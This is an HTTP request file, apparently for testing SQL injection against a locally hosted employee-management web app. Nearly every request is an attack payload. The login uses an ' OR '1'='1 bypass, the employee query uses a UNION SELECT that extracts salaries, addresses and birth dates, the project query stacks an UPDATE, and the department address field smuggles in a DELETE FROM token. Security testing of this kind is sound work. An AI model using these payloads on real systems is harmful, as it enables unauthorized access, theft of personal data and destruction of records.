# DO LOGIN #
PUT http://localhost:8080/login  HTTP/1.1
content-type: application/json

{
    "username": "mattia",
    "password": "' OR '1'='1"
}

### 

# GET EMPLOYEES DATA #
GET http://localhost:8080/profiles/mattia/employees?query=%27%20UNION%20SELECT%20address%2C%20birth_date%2C%20hire_date%2C%20salary%2C%20%27posizione%27%2C%200%20FROM%20employee--%20 HTTP/1.1
content-type: application/json
Session: 1
Token: Dgr0WDvqTH6_eAYn_MO4WSuhpQiEqAxs9lFnE7xQ8IU

###

# GET PROJECT #
GET http://localhost:8080/profiles/mattia/projects?name=%25%27%20%3B%20UPDATE%20project%20SET%20end_date%20%3D%20%272025-12-31%27%20WHERE%20name%20%3D%20%27wasatext%27%20%3B%20--  HTTP/1.1
content-type: application/json
Session: 1
Token: Dgr0WDvqTH6_eAYn_MO4WSuhpQiEqAxs9lFnE7xQ8IU

###

# GET DEPARTMENT #
GET http://localhost:8080/profiles/mattia/departments  HTTP/1.1
content-type: application/json
Session: 1
Token: Dgr0WDvqTH6_eAYn_MO4WSuhpQiEqAxs9lFnE7xQ8IU

###

# MODIFY DEP ADDR #
PUT http://localhost:8080/profiles/mattia/departments/scienza  HTTP/1.1
content-type: application/json
Session: 1
Token: Dgr0WDvqTH6_eAYn_MO4WSuhpQiEqAxs9lFnE7xQ8IU

{
    "address": "aaa'; DELETE FROM token; -- "
}